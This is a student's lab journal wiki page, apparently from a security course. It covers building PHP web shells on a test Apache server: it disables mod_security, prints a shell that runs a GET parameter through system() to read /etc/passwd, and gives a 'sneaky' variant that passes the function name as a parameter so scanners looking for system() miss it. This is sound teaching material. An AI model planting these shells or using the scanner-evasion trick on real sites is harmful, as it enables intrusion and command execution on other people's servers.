PHP Shell Lab - savannahc502/SavC-TechJournal-SEC260 GitHub Wiki

Pre-Lab Setup

If mod_security was enabled/installed before this lab, make sure to disable it before proceeding.

image

    • Go to /etc/httpd/conf.d and comment out the above lines in mod_security.conf
  • sudo systemctl restart httpd

The test XSS attack via URL should now work:

image

Installing PHP

yum install php php-common php-cli php-curl
php -v
systemctl restart httpd

Create a basic php file and access it from the web browser (changing index.html to index.php via the mv command):

image

image

Intro to the PHP Shell

We previously practiced using GET parameters with PHP in this lab. In PHP, system() function will run system commands within the ( ) e.g.

image

  • URL Breakdown:
    • I am sending a request to the web server at IP address 10.0.17.103, specifically asking for the "form1.php" file with the query parameter "cmm" set to "whoami".
    • Everything following the ? is the query string of the URL
    • "cmm" is the parameter, and "whoami" is the value of the parameter. These get passed to the script I wrote, and thus the phrase "whoami" is echoed

image

  • Here I changed the echo command in my script to the system command, thus resulting in apache instead of whoami

PHP Shell Vulnerabilities

Create a PHP file and see if you can execute "cat /etc/passwd" through your php file. Remember - you can't send "spaces" through a URL, so need to use %encoding. Then, try other commands.

image

<?php

$command1 = $_GET["cmm"];
$output = system($command1); 
echo($output); 

?>
  • New test file for the next vulnerabilities

Testing Commands

image

  • Notice that the %20 between cat and /etc/passwd in the URL disappears after the page loads

image

image

image

image

PHP Shell by Sending the Function as Parameter

Scanning tools may look for php files with common functions like system() and exec(). However, it is possible to use GET and POST parameters to send the php functions as well as the system commands.

  • Goal: Create a web shell that only has the letters GET in the script.

image

  • Here, I am collecting the php function of system and the command as values in the URL, and the php script uses the parameters those values are assigned to to actually execute the script. Therefore while the system() function is not in the actual PHP script, the output is the same.
  • Use & to join multiple GET parameters
<?php
echo("This is Savannah's Sneaky Script "); 

$command1 = $_GET["cmm"];
$command2 = $_GET["system"]; 
$command2($command1); 

?>